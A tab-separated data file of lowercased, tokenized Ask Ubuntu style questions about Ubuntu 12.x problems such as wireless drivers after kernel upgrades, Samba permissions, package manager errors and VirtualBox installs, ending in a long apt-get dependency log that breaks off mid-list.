251521	no wireless connections in linux 3.5.0-20 and onwards	i am using ubuntu 12.10 64bit . it was just fine till linux kernel 3.5.0-19 . but as soon as i upgraded my system to linux 3.5.0-20 , it simply stopped identifying wireless networks in network drop down menu . it continued through -21 and -22 . today only i again installed the updates and linux kernel got upgraded to linux 3.5.0-23 . but to my surprise the problem continues in -23 too . whenever i boot linux 3.5.0-19 ( from boot menu advanced options ) then only my system identifies the surrounding wireless networks . please help . output of lspci -nnk | grep -iea3 `` ( wireless|network ) '' in linux 3.5.0-19 : 12:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) subsystem : dell inspiron m5010 / xps 8300 [ 1028:0010 ] kernel driver in use : wl kernel modules : wl , bcma output of the same script in -23 is : 12:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) subsystem : dell inspiron m5010 / xps 8300 [ 1028:0010 ] kernel modules : bcma 13:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 02 )
251523	where are my u1-synced tomboy notes ?	i 'm running ubuntu 12.04 lts on my eeepc . i have used tomboy notes for several years , and i sync them with ubuntu one . now this morning it seems all my notes have disappeared , but the notebooks are still there . what happened ? how can i recover the lost notes ?
251524	start or stop a server with a single script launcher	i made 2 .sh scripts to start and stop xampp server . i 'd like to merge them in a single launcher to obtain something like a on/off button , so that if xampp has already been started it would stop , but i do n't know how to do that . the code i have in my script is this : # ! /bin/bash sudo /opt/lampp/lampp start ; echo `` starts xampp server '' ; can someone help me ? p.s . i read this answer but it does n't help ... why did oli said `` but i 'll leave this up to you '' ? : p
251525	problems with package manager after uninstalling bumblebee	i uninstalled bumblebee , but now my video card is not working properly . i tried to update its video driver , but now i just got the message an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : type 'ain ' is not known on line 3 in source list /etc/apt/sources.list.d/bumblebee-stable-precise.list' either when i try to update by terminal and also when i open the package manager . i would be glad in having some help !
251526	missing options from settings panel in ubuntu after upgrade from 12.04 to 12.10	after upgrade from 12.04 to 12.10 i am missing multiple options in the settings panel . most seem to be display related like sticky edges in the display panel the behavior tab in the appearance panel does anybody have an idea why these are missing and how to get them back ? i am currently running gnome-shell - not sure if this influences the settings but i am mentioning it for completeness .
251527	virtualbox drive does not expand automatically	i have a strange problem with my vdi based drive in virtualbox , which is that the drive does not expand and this has for some reason also resulted in my x not being able to load . df -h filesystem size used avail use % mounted on /dev/sda1 4.3g 4.3g 0 100 % / udev 1.1g 4.1k 1.1g 1 % /dev tmpfs 421m 750k 420m 1 % /run none 5.3m 0 5.3m 0 % /run/lock none 1.1g 0 1.1g 0 % /run/shm none 105m 8.2k 105m 1 % /run/user overflow 1.1m 0 1.1m 0 % /tmp and the drive size : is there a way for ubuntu to reallocate its actual space ? gparted : attempt to expand not possible :
251528	creating your own bazaar server	i 'm trying to run your own bazaar server on ubuntu 12.04 server - so far after reading stuff in internet i found this `` tutorial '' http : //michael.lustfield.net/content/creating-your-own-bazaar-server - this looked quite clearly for me so i have followed the instructions . but at the end when i want to push something to repo i get only : damian @ damian-desktop : ~/pulpit $ bzr checkout bzr+ssh : //testpxe.servebeer.com/home/tomasz/bzr/test1 testowy-projekt1 bzr : error : permission denied : `` /home/tomasz/bzr/test1/.bzr/branch-format '' : : [ errno 13 ] permission denied : u'/home/tomasz/bzr/test1/.bzr/branch-format' damian @ damian-desktop : ~/pulpit $ user permissions are ok - this was firs thing that i have checked ( i have even tryed to give extremely generous permissions just for testing ) , any ideas ?
251533	how to compile and install virtual usb ?	after days of searching i found this link and seems it has what i 've been looking for ! i could n't install it , i 'm so new linux user can u give me a hand in this : ( please readme file says : to compile the driver you need to have source codes of your os kernel . default makefile is searching for kernel source codes in `` /usr/src/linux '' folder to compile the driver . if your kernel is in the other folder you can point its location in the file system using kerneldir variable . e.g . : make kerneldir=/usr/src/kernel-source-2.6.17.5 after successful driver compilation there will be tusbd.ko file in the `` /modules/src/tusbd/ '' folder . this file is necessary for usb server operation did n't know what to do ! from a comment to web-e 's answer : sudo ./installer.sh install installing low-level-world inc usb server + usb client ... no kernel module found for your kernel version . will try to compile from sources . compiling kernel module ... can not compile kernel module . installation terminated . see buildlog.txt file for more information . make : /usr/src/linux : no such file or directory . stop . make : [ clean ] error 2
251535	program menus look bad on kde	until recently i was using the default environment when installing ubuntu , that is unity . i just install kde using the command sudo apt-get install kde-plasma-desktop . when i open programs such as firefox , libreoffice , etc. , their menus look terrible . i suspect it has something to do with gtk+ , but i do n't know how to solve the problem . is there a package that has not been installed by running the command sudo apt-get install kde-plasma-desktop ?
251536	samba guest account not in group ?	i have my samba config as such : [ global ] security = user guest account = nobody [ media ] path = /data/media browsable = yes guest ok = yes guest only = yes read only = no create mask = 0765 which works fine - windows clients browse to shares as guest and get mapped to the nobody account . however i have a strange problem . if i have a file owned by nobody , such as : -rwxrw-r -- 1 nobody media 252125 dec 18 2011 rss.dat my windows clients can do whatever they like to the file . however if a file is not owned by nobody : -rwxrw-r -- 1 user media 252125 dec 18 2011 rss.dat then my windows clients ca n't touch the file , windows always says you need permission from `` server\user '' to change the file . however nobody is in the media group : # from /etc/group media : x:1002 : user , nobody so should n't the nobody user be able to change files because of group permissions ? or is there something special with samba i 'm missing ? thanks !
251537	how to manualy install the bootloader in ubuntu 12.10	i have a small notebook that i was using a previous version of ubuntu on and it worked perfectly until i did a clean install with the latest 12.10 . i install ubuntu by usb since the notebook has no cd drive . i am not duelbooting , only ubuntu is on this notebook . everything seems to be installing perfectly until i get an error when it tries to install the bootloader . i did a little google searching and saw it was common so i decided to proceed without the bootloader and install in manualy later . however when i tried to install it later from the codes that i found online using the terminal , i get no luck . i am only a newbe to linux and the terminal even tho i have used ubuntu for a while , it has mostly been used for travel and leasure . ie : internet and films if anyone can help it be most appreciated as i am not sure what i am doing wrong . what i have tried so far is installing the bootloader by booting into the live usb and using the terminal there , but to be honest i am unsure what i am doing . thanks k .
251545	why ca n't chrome `` load plugin '' for youtube ? ( which i assume is adobe flash player )	i 'm using chrome 24.0.1312.68 which is supposed to have fixed a recent `` ca n't load plug-in '' error . i have tried the instructions on the page http : //helpx.adobe.com/flash-player/kb/flash-player-google-chrome.html # main__i_am_unable_to_view_flash_content__how_do_i_get_flash_player_to_turn_on_ to turn flash player on and i have restarted my browser and it still gives me this error . how do i get around this error ?
251548	duplex printing gives punched holes in wrong place	when i print single sided , the punched holes ( on a4 ) show up on the correct side of the documents . when i print duplex , the punched holes end up on the wrong side . ( they should be on the left side if looking at the first page . ) i understand there should be some kind of cups setting to make duplex printing use the correct orientation , but i ca n't find where it is . ( this problem is to many/most duplex capable printers and not linux specific btw , but i ca n't find in ubuntu the setting . ) the option to actually go to the printer and turn the pages physically is not acceptable , since i share office with co-workers who print non-duplex .
251555	install by wubi : 'no medium found '	i want to install ubuntu by wubi . but when i reboot to finish installation , it returns this : ďźinitramfsďźstdin : i/o error /scripts/casper-premount/20iso_scan : line46 : ca n't open /dev/sr0 : no medium found could not find the iso /ubuntu/install/instalation.iso this could also happen if the file system is not clean because of an operating system crash , an interrupted boot process , an improper shutdown , or unplugging of a removable device without first unmounting or ejecting it , to fix this , simply reboot into windows , let it fully start , log in , run '' chkdsk /r '' , then gracefully shut down and reboot back into windows . after this you should you should be able to reboot again and resume the installation . i have tried running chkdsk , but it didn`t work.what should i do ?
251561	lag spikes and missing n standard for wireless connection with broadcom bcm4327	i have a laptop aspire 5750g with the broadcom bcm4327 . i have enabled proprietary drivers and installed it but there are some problems : first : if i do iwconfig eth2 this is the result : eth2 ieee 802.11abg essid : '' infostradawifi-f480dc '' mode : managed frequency:2.412 ghz access point : 84 : c9 : b2 : f4:80 : dd tx-power=200 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : on encryption key : off -- - > not true i have wpa ieee 802.11abg -- - > not true my card supports n as a plus , testing the ping with the router i get horrible random lag spikes even really close to him , every 30-40 packets the ping goes up to 700-800 for 2-3 packets , and this is really annoying if i play some realtime games such as starcraft or heroes of newerth ( linux native ) . another strange thing is that on other machines wireless interfaces are called wlan0..1.. i got eth2 but my connection is wireless ... thank you very much for your support .
251570	how to install 12.10 on a virtualbox under windows 7 host ?	i 've just been looking at lots of similar issues to this but none have a fix that works for me . i 've got a windows 7 64-bit intel core i7 system on which i 'm trying to install ubuntu 12.10 ( 32-bit and 64-bit ) under a virtualbox vm . i 've tried booting from an iso and from a disc and the furthest i can get is the boot options . if i try to run without installing or install it moves on and then simply crashes it seem ( just blank screen with the cursor , not blinking ) . i 've tried with nomodeset , no acpi etc as suggested in related questions . to test i tried installing fedora as well and that caused a kernel panic but i could n't figure anything out from that . i 've got two virtual machines running xp already installed so i do n't know if there are settings in virtualbox that are necessary for ubuntu which i need to set . i 'm not sure if this is graphics related , but if it helps i 've got an nvidia gtx 460 v2 . update i 've setup another vm to try and install suse but when selecting 'boot from hard disk ' that seems to behave the same way - it attempts to boot & just crashes on a similar screen . although here i ca n't force a reboot with right ctrl + delete . virtual box version 4.2.6 settings for vm : http : //pastebin.com/b6eqrss4
251571	12.04 updates caused blue screen after login with taskbar or icons	i 'm still new to linux and have been testing it out on my laptop . i ran updates on ubuntu 12.04lts and something failed along the way . after reboot , when i log in , the screen is blue and the icons and taskbar are not displayed . i can not even open up the terminal . i ran sudo apt-get install ubuntu-desktop and that fixed the issue , however , i am only limited to ubuntu at login . the ubuntu-2d option ( unity-2d ) is now missing . i tried reinstalling unity-2d with sudo apt-get install unity-2d and to no luck . sorry i 'm a newb . any advice is welcomed .
251573	plantronics blackwire c220m microphone is not working	using a full updated ubuntu 12.10 , my usb plantronics blackwire c220m headset 's mic is n't working . i 've plugged it in and the headphones started to work immediately but mic was n't detected . reboot solved that and the mic appeared in the input devices , but when i try to select it the audio setting menu just crashes . ubuntu asked 2 times to send a report after that 's happening and now the audio setting window just silently closes after i try to select the headset 's mic . changing usb port do n't help .
251577	how to supervise and automatically restart a process ?	i want to have a process which will be restarted if it crashes . i googled a bit and found that an easy solution is to use daemontools . i did n't understand how to configure it . what is the easiest way to acomplish such a functionality ? how to configure it ?
251579	open gl problem , diablo iii problem	i have basically two problems . the first relates to opengl and cairo . i have a strange icons color in cairo . i know it 's a problem with open gl , but i do not know how to set the nvidia control panel to make it work . the second problem is the launching diablo iii . after installing the game on play on linux it was working properly for a while , after playing witch nviadai panel i can not launch the game on the big screen , the game starts on secondery screen . even when i turn it off in the options diablo is turning it on by itself . ps . im using ubuntu 12.04 lts gc gtx 570 thx for help
251580	created hotspot not found using other devices	i have ubuntu 12.10 on my desktop machine and have a wireless capability on it using d-link dwa-121 . the desktop machine have ethernet connection . when creating a wireless hotspot by doing the following : open all settings -- > network -- > wireless -- > use as hotspot i ca n't see the network from other machines or phones . any hints ?
251584	how to batch convert legacy files to utf8 ?	i think the ideal solution for me is a nautilus script that performs encoding conversion on selected files . the following script reads the encoding of a selected file and performs utf8 conversion if it 's not utf8 , but i could n't figure out how to make it work on multiple files : charset= '' $ ( file -bi `` $ 1 '' |awk -f `` = '' ' { print $ 2 } ' ) '' if [ `` $ charset '' ! = utf-8 ] ; then iconv -f `` $ charset '' -t utf8 `` $ 1 '' -c -o `` $ 1.utf8 '' fi
251585	messed up partitions after 11.04 upgrade	i wanted to upgrade my old 10.10 to 12.04 using alternate cd , and had to upgrade to 11.04 first . unfortunately i ran into the following error after upgrading and rebooting to ubuntu : the disk drive for /boot is not yet ready or not present .. with options to either ignore the error or manually repair . ignoring the error led to the same message with `` /home '' and them prompted the ubuntu log-in screen . once logged , several errors messages popped up and no gui was displayed , leaving no other option than to reboot . solutions for similar problems were given here : http : //ubuntuforums.org/showthread.php ? t=1724209 and there : root filesystem check fails after power failure during installation installation ( remount the root partition , then launch an update ) but in my case that did n't fixed the issue . my pc is configured as a dualboot windows7/ubuntu 64 bits on a raid0 , using two hd . my /etc/fstab is as following : /dev/mapper/isw_djibifgbhd_volume06 / ext4 errors = remount-ro /dev/mapper/isw_djibifgbhd_volume03 /boot ext4 defaults /dev/mapper/isw_djibifgbhd_volume07 /home ext4 defaults /dev/mapper/isw_djibifgbhd_volume05 none swap defaults using fsck -a and mount -a lead me to the following messages : fsck -a : fsck.ext4 : no such file or directory while trying to open dev/mapper/isw_djibifgbhd_volume06 mount -a : mount : special device /dev/mapper/isw_djibifgbhd_volume03 does not exist mount : special device /dev/mapper/isw_djibifgbhd_volume07 does not exist when booting on a live cd , gparted could not recognized my partitions ( just the two hard disks ) while disk utility still detect how the different drives were configured . i assume i just have to make the system recognize the volumes somehow . the solution may be trivial , but i am not used to deal with this kind of problems and i do n't know how to resolve this issue . if someone can give me some hints about how to proceed , thanks in advance !
251591	ubuntu not shutting down properly	i have installed ubuntu 12.10 on my hp pavilion g6 notebook . it is working all fine except when i try to shut it down , it gets unresponsive . it would display some processes and hangs up . i am new to this os so i do n't know up the problem could be . i do n't know what is happening . also , sometimes it shows an error message saying : sorry , some internal error has occured . and then it asks for checking online for solution , but that has also not provide any help .
251593	search files in subfolder and export results to file	i have a folder with hundreds of subfolders . i need to locate recursively within the subfolders those that do n't have certain files inside ( for instance *ch.pdf or *.jpg ) and export the results to a txt file . thx in advance
251598	tomboy sync ; local folder resets to wrong path	because tomboy synchronization with ubuntu one is being dropped soon , i want to sync my notes using dropbox . i set the preferences so that tomboy syncs with my local dropbox folder : /home/duxk/documents/dropbox/tomboy when i save these settings , however , the folder path is changed automatically to /home/duxk and my tomboy notes are synced to that folder instead . any idea how to fix this ? alternatively , where can i find tomboy 's configuration file that indicates which folder it syncs to ?
251601	why are some programs in the ubuntu software center not open source ?	i 'm concerned about the amount of proprietary software that seems to be part of ubuntu now . i 've noticed quite a few apps that in the software center are listed as `` licence : proprietary '' . obviously there 's the partner stuff , like skype ( although that 's not good example as it does n't work in the software center ) but there seems to be a fair load of other stuff creeping in , too . is there something i 've not understood here ? is it all in partner or is some proprietary stuff in the main ubuntu repos ? is there a way to filter for foss ? the open source bit is important to me - i do n't just want a free-beer os as i think open source software model is better . debian is strictly foss ( afaik ) , for example .
251604	failed to download repository information . no ppa	trying to update my ubuntu 12.04 i 've been getting this error failed to download repository information check your internet connection . w : failed to fetch http : //ppa.launchpad.net/venerix/blug/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/venerix/blug/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i 've been going through other posts and have seen that many recommend deleting the ppa from sources list so i tried doing that but when i opend the list there was no ppa . what should i do ? also , in the update manager it wo n't show me the upgrade to ubuntu 12.10 option , fixing the first problem will solve this too ? because i want to upgrade without formatting
251608	how to modify ubuntu precise .iso preseed ?	i 'm trying to modify the installation sequence of ubuntu precise . i need add a repository package inside the iso . i make my own apt repository mirror and add my own packages with reprepro includedeb then i run mkisofs to make my .iso an include in the final iso . then i build my customized debian-installer including iso-scan udeb package . after that , i build the fake final iso with : grub-mkrescue in the process of installation when the iso-scan work takes place it ca n't find the repo.iso file and installation process stops . i have searched but i only found things related to debian-installer . i do n't know how to do it in ubuntu alternate or similar installations .
251614	how can i enable spell checking in gnote ?	i recently upgraded from ubuntu 11.10 to 12.04 . i 'm pretty sure the version of gnote that came with ubuntu 11.10 supported spell checking . however , spell checking does not appear to work in the version of gnote that comes with ubuntu 12.04 ( 8.2 ) . is it possible to enable spell checking in gnote 8.x ? if so , how ?
251618	how does the shell environment load when logging in graphically ?	i 've found that when logging in graphically the shell loading process works differently than logging in through the console . environment variables such as $ bash_version and $ zsh_version are not set when logging in graphically , and a script specifically written for bash and zsh that i tried to use while logging in causes the login process to restart and returns me to the login prompt ( which stops me from logging in while this script is in place ) , when logging in through the console the same setup works fine though . in this chruby-thread on github i talk about the case where i am experiencing the issue . is the shell loading process working as it should when logging in graphically , and if so is there any documentation on how it works ( and if so , where can i find it ) ? how should i make this work ?
251624	set default folders to external hdd permanently	i use an external hard drive for my videos and pictures . i 've used ubuntu tweak to change the path of those two default folders to the folders on my external hdd . getting to this point is no problem ( see image below ) . however , it stops working after i either restart my laptop or unplug my hard drive as the folders disappear from the nautilus places list . is there any way to fix this and set the default paths permanently ? ( ubuntu 12.10 / nautilus 3.4.2 )
251630	apt-get -f install simply not working	everytime i am trying to install a package with apt-get install i get this . reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : deluge-gtk : depends : python-notify but it is not going to be installed fontconfig : depends : libfontconfig1 ( > = 2.8.0 ) but it is not going to be installed gstreamer0.10-plugins-good : i386 : depends : libcaca0 : i386 ( > = 0.99.beta17-1 ) but it is not going to be installed depends : libflac8 : i386 ( > = 1.2.1 ) but it is not going to be installed ia32-libs-multiarch : i386 : depends : libasyncns0 : i386 but it is not going to be installed depends : libfontconfig1 : i386 but it is not going to be installed depends : libsdl-mixer1.2 : i386 but it is not going to be installed depends : libsdl-image1.2 : i386 but it is not going to be installed depends : libsdl-ttf2.0-0 : i386 but it is not going to be installed depends : libsdl1.2debian : i386 but it is not going to be installed indicator-application : depends : libdbusmenu-gtk3-4 ( > = 0.4.2 ) but it is not going to be installed libappindicator1 : depends : libdbusmenu-glib4 ( > = 0.4.2 ) but it is not going to be installed depends : libdbusmenu-gtk4 ( > = 0.4.2 ) but it is not going to be installed libappindicator3-1 : depends : libdbusmenu-glib4 ( > = 0.4.2 ) but it is not going to be installed depends : libdbusmenu-gtk3-4 ( > = 0.4.2 ) but it is not going to be installed libasound2-plugins : i386 : depends : libpulse0 : i386 ( > = 1:0.99.1 ) but it is not going to be installed libblas3 : depends : libgfortran3 ( > = 4.3 ) but it is not going to be installed libcairo2 : depends : libfontconfig1 ( > = 2.8.0 ) but it is not going to be installed libcairo2 : i386 : depends : libfontconfig1 : i386 ( > = 2.8.0 ) but it is not going to be installed libcanberra-gtk0 : i386 : depends : libcanberra0 : i386 ( > = 0.12 ) but it is not going to be installed libcanberra-gtk3-module : depends : libcanberra-gtk3-0 ( > = 0.25 ) but it is not going to be installed libgd2-xpm : depends : libfontconfig1 ( > = 2.8.0 ) but it is not going to be installed libgd2-xpm : i386 : depends : libfontconfig1 : i386 ( > = 2.8.0 ) but it is not going to be installed libgettextpo0 : i386 : depends : libcroco3 : i386 ( > = 0.6.2 ) but it is not going to be installed libgtk-3-0 : depends : libfontconfig1 ( > = 2.8.0 ) but it is not going to be installed libgtk2.0-0 : depends : libfontconfig1 ( > = 2.8.0 ) but it is not going to be installed libgtk2.0-0 : i386 : depends : libfontconfig1 : i386 ( > = 2.8.0 ) but it is not going to be installed liblapack3 : depends : libgfortran3 ( > = 4.6 ) but it is not going to be installed breaks : liblapack3gf ( < 3.4.1-1 ) liblapack3gf : depends : libgfortran3 ( > = 4.6 ) but it is not going to be installed libpango1.0-0 : depends : libfontconfig1 ( > = 2.8.0 ) but it is not going to be installed libpango1.0-0 : i386 : depends : libfontconfig1 : i386 ( > = 2.8.0 ) but it is not going to be installed libpulse-mainloop-glib0 : i386 : depends : libpulse0 : i386 ( > = 1:1.1-0ubuntu15.2 ) but it is not going to be installed libpulsedsp : i386 : depends : libpulse0 : i386 ( > = 1:1.1-0ubuntu15.2 ) but it is not going to be installed libqtgui4 : i386 : depends : libfontconfig1 : i386 ( > = 2.8.0 ) but it is not going to be installed librsvg2-common : depends : librsvg2-2 ( = 2.36.1-0ubuntu1 ) but it is not going to be installed librsvg2-common : i386 : depends : librsvg2-2 : i386 ( = 2.36.1-0ubuntu1 ) but it is not going to be installed libsdl-net1.2 : i386 : depends : libsdl1.2debian : i386 ( > = 1.2.10-1 ) but it is not going to be installed libxft2 : depends : libfontconfig1 ( > = 2.8.0 ) but it is not going to be installed libxft2 : i386 : depends : libfontconfig1 : i386 ( > = 2.8.0 ) but it is not going to be installed notification-daemon : depends : libcanberra-gtk3-0 ( > = 0.25 ) but it is not going to be installed openssh-client : depends : libedit2 ( > = 2.11-20080614-1 ) but it is not going to be installed php5-cli : depends : libedit2 ( > = 2.11-20080614-1 ) but it is not going to be installed postgresql-client-9.1 : depends : libedit2 ( > = 2.11-20080614-1 ) but it is not going to be installed python-glade2 : depends : libglade2-0 ( > = 1:2.6.1 ) but it is not going to be installed python-pygame : depends : libsdl-image1.2 ( > = 1.2.10 ) but it is not going to be installed depends : libsdl-mixer1.2 but it is not going to be installed depends : libsdl-ttf2.0-0 but it is not going to be installed depends : libsdl1.2debian ( > = 1.2.10-1 ) but it is not going to be installed depends : libsmpeg0 but it is not going to be installed rtorrent : depends : libtorrent14 but it is not going to be installed x11-utils : depends : libfontconfig1 ( > = 2.8.0 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . when i run apt-get -f install i get this . reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : bluez-alsa : i386 libgconf-2-4 : i386 libatk1.0-0 : i386 libqt4-declarative : i386 libgail18 : i386 libqt4-qt3support : i386 libunistring0 : i386 libcupsimage2 : i386 gtk2-engines : i386 libgudev-1.0-0 : i386 libcdparanoia0 : i386 libcairo-gobject2 : i386 libavc1394-0 : i386 ssh-import-id libqt4-test : i386 libqt4-script : i386 libqt4-designer : i386 libqt4-network : i386 libqt4-dbus : i386 libproxy1 : i386 ibus-gtk : i386 libdbus-glib-1-2 : i386 libspeex1 : i386 gvfs-libs : i386 libgomp1 : i386 libcapi20-3 : i386 libibus-1.0-0 : i386 libcairo2 : i386 libvisual-0.4-0 : i386 libcanberra-gtk-module : i386 gtk2-engines-murrine : i386 libwavpack1 : i386 libqt4-opengl : i386 libsoup-gnome2.4-1 : i386 libglib2.0-0 : i386 libmysqlclient18 : i386 gstreamer0.10-plugins-good : i386 libqt4-xmlpatterns : i386 librsvg2-common : i386 libdatrie1 : i386 libiec61883-0 : i386 libgdk-pixbuf2.0-0 : i386 libpixman-1-0 : i386 libqtcore4 : i386 libtheora0 : i386 libaa1 : i386 libthai0 : i386 libao4 : i386 libcanberra-gtk0 : i386 libqt4-sql : i386 libqt4-svg : i386 libgail-common : i386 liborc-0.4-0 : i386 libraw1394-11 : i386 libshout3 : i386 libdv4 : i386 libqt4-xml : i386 gstreamer0.10-x : i386 libgettextpo0 : i386 libsdl-net1.2 : i386 libjasper1 : i386 libvisual-0.4-plugins : i386 libgstreamer-plugins-base0.10-0 : i386 libudev0 : i386 libgnome-keyring0 : i386 gtk2-engines-pixbuf : i386 libqtgui4 : i386 libtag1c2a : i386 libssl0.9.8 : i386 gtk2-engines-oxygen : i386 libpango1.0-0 : i386 gvfs : i386 libqt4-sql-mysql : i386 libqt4-scripttools : i386 libqtwebkit4 : i386 libgstreamer0.10-0 : i386 libxcb-shm0 : i386 gstreamer0.10-plugins-base : i386 libmng1 : i386 libgtk2.0-0 : i386 glib-networking : i386 libsoup2.4-1 : i386 libtag1-vanilla : i386 libjson-glib-1.0-0 librsvg2-2 : i386 libavcodec53 : i386 libcroco3 : i386 libgsm1 : i386 libsdl-mixer1.2 : i386 libavutil51 : i386 libsdl-ttf2.0-0 : i386 libsdl-image1.2 : i386 libcanberra0 : i386 gstreamer0.10-gconf : i386 libmad0 : i386 libmikmod2 : i386 libmp3lame0 : i386 libopenjpeg2 : i386 libvpx1 : i386 libdirac-encoder0 : i386 libschroedinger-1.0-0 : i386 libxvidcore4 : i386 libx264-123 : i386 libva1 : i386 libwebp2 : i386 libqtdbus4 : i386 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : colord freeglut3 : i386 gstreamer0.10-gconf : i386 gtk2-engines-pixbuf : i386 ia32-libs ia32-libs-i386 : i386 lesstif2 : i386 libapache2-mod-php5 libappindicator1 libasyncns0 libasyncns0 : i386 libavcodec53 : i386 libavutil51 : i386 libcaca0 libcaca0 : i386 libcairo2 libcairo2 : i386 libcanberra-gtk3-0 libcanberra0 libcanberra0 : i386 libcolord1 libcroco3 libcroco3 : i386 libdbusmenu-glib4 libdbusmenu-gtk3-4 libdbusmenu-gtk4 libdirac-encoder0 : i386 libdirectfb-1.2-9 libdirectfb-1.2-9 : i386 libedit2 libedit2 : i386 libexif12 libexif12 : i386 libflac8 libflac8 : i386 libfltk1.1 : i386 libfontconfig1 libfontconfig1 : i386 libgail-common : i386 libgail18 : i386 libgd2-xpm libgd2-xpm : i386 libgfortran3 libglade2-0 libgnutls26 libgnutls26 : i386 libgphoto2-2 libgphoto2-2 : i386 libgphoto2-port0 libgphoto2-port0 : i386 libgsm1 : i386 libgtk-3-0 libgtk-3-bin libgtk-3-common libgtk2.0-0 libgtk2.0-0 : i386 libgusb2 libieee1284-3 libjbig0 libjbig0 : i386 libjpeg62 libjpeg62 : i386 libjson-glib-1.0-0 libjson0 libjson0 : i386 liblapack3gf liblcms2-2 liblzma5 liblzma5 : i386 liblzo2-2 : i386 libmad0 libmad0 : i386 libmikmod2 libmikmod2 : i386 libmp3lame0 libmp3lame0 : i386 libnotify4 libnspr4 libnspr4 : i386 libnspr4-0d : i386 libnss3 libnss3 : i386 libnss3-1d libnss3-1d : i386 libonig2 libopenjpeg2 : i386 libpam0g libpam0g : i386 libpango1.0-0 libpango1.0-0 : i386 libpopt0 libpopt0 : i386 libpulse0 libpulse0 : i386 libqdbm14 libqt4-dbus libqt4-dbus : i386 libqt4-declarative : i386 libqt4-designer : i386 libqt4-network : i386 libqt4-opengl : i386 libqt4-qt3support : i386 libqt4-script : i386 libqt4-scripttools : i386 libqt4-sql : i386 libqt4-sql-mysql : i386 libqt4-svg : i386 libqt4-test : i386 libqt4-xml libqt4-xml : i386 libqt4-xmlpatterns : i386 libqtcore4 libqtcore4 : i386 libqtdbus4 libqtdbus4 : i386 libqtgui4 : i386 librsvg2-2 librsvg2-2 : i386 librsvg2-common librsvg2-common : i386 libsane libsane : i386 libsane-common libsane-extras libsane-extras : i386 libsane-extras-common libschroedinger-1.0-0 : i386 libsdl-image1.2 libsdl-image1.2 : i386 libsdl-mixer1.2 libsdl-mixer1.2 : i386 libsdl-ttf2.0-0 libsdl-ttf2.0-0 : i386 libsdl1.2debian libsdl1.2debian : i386 libsigc++-2.0-0c2a libsigc++-2.0-0c2a : i386 libsmpeg0 libsndfile1 libsndfile1 : i386 libssh2-1 : i386 libsvga1 : i386 libsysfs2 : i386 libtiff4 libtiff4 : i386 libts-0.0-0 libts-0.0-0 : i386 libv4l-0 libv4l-0 : i386 libv4lconvert0 libv4lconvert0 : i386 libva1 : i386 libvpx1 : i386 libwebp2 libwebp2 : i386 libx264-123 : i386 libx86-1 : i386 libxcb-render-util0 : i386 libxft2 libxft2 : i386 libxml2 libxml2 : i386 libxml2-dev libxmuu1 libxmuu1 : i386 libxvidcore4 : i386 openssh-blacklist openssh-blacklist-extra openssh-client openssh-server php5-cgi php5-cli php5-common php5-curl php5-gd php5-imap php5-mcrypt php5-mysql php5-sqlite php5-xsl plymouth python-appindicator python-glade2 python-gtk2 python-notify qdbus sane-utils suggested packages : ia32-libs-gtk ia32-libs-gtk-i386 : i386 php-pear libcanberra-gtk0 libcanberra-pulse libcanberra-pulse : i386 libgd-tools libgd-tools : i386 gphoto2 gphoto2 : i386 gtkam gtkam : i386 liblcms2-utils libpam-doc libpam-doc : i386 ttf-baekmuk ttf-arphic-gbsn00lp ttf-arphic-bsmi00lp ttf-arphic-gkai00mp ttf-arphic-bkai00mp ttf-baekmuk : i386 ttf-arphic-gbsn00lp : i386 ttf-arphic-bsmi00lp : i386 ttf-arphic-gkai00mp : i386 ttf-arphic-bkai00mp : i386 pulseaudio pulseaudio : i386 libqt4-declarative-folderlistmodel : i386 libqt4-declarative-gestures : i386 libqt4-declarative-particles : i386 libqt4-declarative-shaders : i386 qt4-qmlviewer : i386 libqt4-dev : i386 libicu48 : i386 qt4-qtconfig : i386 librsvg2-bin librsvg2-bin : i386 hpoj hplip hpoj : i386 hplip : i386 ssh-askpass libpam-ssh keychain monkeysphere rssh molly-guard desktop-base plymouth-drm python-gtk2-doc unpaper recommended packages : sane-utils : i386 xml-core : i386 ncurses-term the following packages will be removed : ia32-libs-multiarch : i386 libpulse-mainloop-glib0 : i386 libpulsedsp : i386 the following new packages will be installed : colord freeglut3 : i386 gstreamer0.10-gconf : i386 ia32-libs-i386 : i386 lesstif2 : i386 libasyncns0 libasyncns0 : i386 libavcodec53 : i386 libavutil51 : i386 libcaca0 libcaca0 : i386 libcanberra-gtk3-0 libcanberra0 libcanberra0 : i386 libcolord1 libcroco3 libcroco3 : i386 libdbusmenu-glib4 libdbusmenu-gtk3-4 libdbusmenu-gtk4 libdirac-encoder0 : i386 libdirectfb-1.2-9 libdirectfb-1.2-9 : i386 libedit2 libedit2 : i386 libexif12 libflac8 libflac8 : i386 libfltk1.1 : i386 libfontconfig1 libfontconfig1 : i386 libgfortran3 libglade2-0 libgphoto2-2 libgphoto2-port0 libgsm1 : i386 libgusb2 libieee1284-3 libjbig0 libjbig0 : i386 libjpeg62 : i386 libjson-glib-1.0-0 libjson0 libjson0 : i386 liblcms2-2 liblzma5 : i386 liblzo2-2 : i386 libmad0 libmad0 : i386 libmikmod2 libmikmod2 : i386 libmp3lame0 : i386 libnotify4 libnspr4-0d : i386 libnss3-1d : i386 libonig2 libopenjpeg2 : i386 libpam0g : i386 libpopt0 : i386 libpulse0 libpulse0 : i386 libqdbm14 libqtdbus4 libqtdbus4 : i386 librsvg2-2 librsvg2-2 : i386 libsane libsane-extras libsane-extras : i386 libsane-extras-common libschroedinger-1.0-0 : i386 libsdl-image1.2 libsdl-image1.2 : i386 libsdl-mixer1.2 libsdl-mixer1.2 : i386 